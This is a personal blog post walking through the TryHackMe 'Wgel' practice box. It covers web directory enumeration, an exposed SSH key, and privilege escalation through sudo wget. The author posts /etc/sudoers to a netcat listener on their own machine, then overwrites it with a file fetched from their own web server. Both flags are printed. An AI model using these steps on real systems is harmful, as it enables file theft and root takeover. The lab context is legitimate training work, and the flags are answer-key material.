top of page
Search
aldern00b
Jun 12, 20222 min read

Wgel - THM

Have fun with this easy box.


K, ssh and apache. Apache brings us to an unconfigured website so let's pop open gobuster. Gobuster finds a /sitemap folder and brings us to a template page. Let's poke around. Decided to poke with dirb. Looks like we have a .ssh folder in there with an RSA key.


We can't use that just yet though because we need a username. Unfortunately I wasn't smart enough to look at the source code on the Apache page itself so got the idea from the writeup. Looks like Jessie is an important person


Let's try that as a username. ...well damnit.


fine. Let's try Hydra while we try and figure this out. While we did some research it seemed it was easy enough to just change the permissions on the file itself

chmod 400 id_rsa

this then let us use ssh to login as jessie

ssh -i id_rsa jessie@10.10.104.137

Heading into her Documents folder we get the user flag


User Flag: 057c67131c3d5e42dd5cd3075b198ff6

Okay for the upgraded shell... I had to look this up. Check out this writeup here

Here's my "walkthrough" of how we did this.


What we're going to be doing is modifying the /etc/sudoers file to give jessie all the power. In order to do this we need to get a copy of the original file. So we're going to stand up a netcat listener so we can get the output of this file


nc -lvnp 1234

Then we're going to use this command to send the text (post) of that file to our local machine.


sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.127.98:1234

This pushes the plain text to our PC to read, it will show up on our netcat screen. We're just going to copy this text and paste it into a new file called sudoers, on our local box, commenting out her old permissions and giving her new permissions.

Next we start up a python web server so we can host this new file and use wget again to download it.


python3 -m http.server

Back under jessie's login we run the command below, making sure to point that output area to overwrite the existing sudoers file we read earlier


sudo /usr/bin/wget 10.10.127.98:8000/sudoers --output-document=/etc/sudoers

once we do this we can validate by running sudo -l -l to see she now has ALL under the "Sudoers entry:" portion of that file. Once that's done we run sudo su to switch into root without a password and then pop our flag.



Root flag is b1b968b37519ad1daa6408188649263d

I don't know if I would have marked this box "easy" ... or else... I'm still not ready for "easy" boxes on my own yet lol




4 views0 comments

Recent Posts

See All

Comments

bottom of page